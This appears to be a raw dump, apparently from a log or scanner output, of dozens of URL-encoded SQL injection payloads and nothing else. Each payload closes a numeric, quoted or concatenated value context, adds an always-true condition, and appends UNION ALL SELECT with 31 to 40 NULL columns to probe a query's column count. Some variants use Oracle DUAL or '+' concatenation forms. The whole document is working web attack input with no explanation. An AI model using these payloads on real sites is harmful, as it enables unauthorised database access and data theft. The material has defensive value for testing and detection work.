1234.5%29%20WHERE%205669%3D5669%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%206309%3D6309%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%207806%3D7806%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%201835%3D1835%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%203245%3D3245%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%202329%3D2329%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%206906%3D6906%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%206295%3D6295%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%202886%3D2886%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%209054%3D9054%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%209751%3D9751%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%203224%3D3224%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%207100%3D7100%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%206491%3D6491%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%208888%3D8888%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%205725%3D5725%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%201474%3D1474%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%209831%3D9831%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%207614%3D7614%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%202581%3D2581%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%204666%3D4666%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%201086%3D1086%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%209740%3D9740%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%204458%3D4458%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%206951%3D6951%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%207873%3D7873%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%209161%3D9161%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%202833%3D2833%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%202092%3D2092%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%209225%3D9225%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%207080%3D7080%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27gYCM%27%20FROM%20DUAL%20WHERE%206663%3D6663%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27JwwD%27%20FROM%20DUAL%20WHERE%206168%3D6168%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27poNB%27%20FROM%20DUAL%20WHERE%205411%3D5411%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27tyvw%27%20FROM%20DUAL%20WHERE%208832%3D8832%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27TqoT%27%20FROM%20DUAL%20WHERE%209521%3D9521%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27VUSY%27%20FROM%20DUAL%20WHERE%203145%3D3145%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27XVVZ%27%20FROM%20DUAL%20WHERE%207825%3D7825%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27jjMN%27%20FROM%20DUAL%20WHERE%209115%3D9115%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27Rsug%27%20FROM%20DUAL%20WHERE%207413%3D7413%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27BVoy%27%20FROM%20DUAL%20WHERE%204234%3D4234%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27QEbj%27%20WHERE%203794%3D3794%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27Irkb%27%20WHERE%205113%3D5113%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27EUrO%27%20WHERE%201417%3D1417%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27suAt%27%20WHERE%207437%3D7437%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27JbUu%27%20WHERE%201685%3D1685%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27JCPq%27%20WHERE%205165%3D5165%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27fCaq%27%20WHERE%205256%3D5256%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27jvvu%27%20WHERE%204052%3D4052%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27cvXe%27%20WHERE%202597%3D2597%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27AunR%27%20WHERE%204449%3D4449%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20tCjJ%20WHERE%202645%3D2645%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20ZwaM%20WHERE%209936%3D9936%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20xmEk%20WHERE%202260%3D2260%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20pYrA%20WHERE%205667%3D5667%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20Vioy%20WHERE%208109%3D8109%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20lRJd%20WHERE%206437%3D6437%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 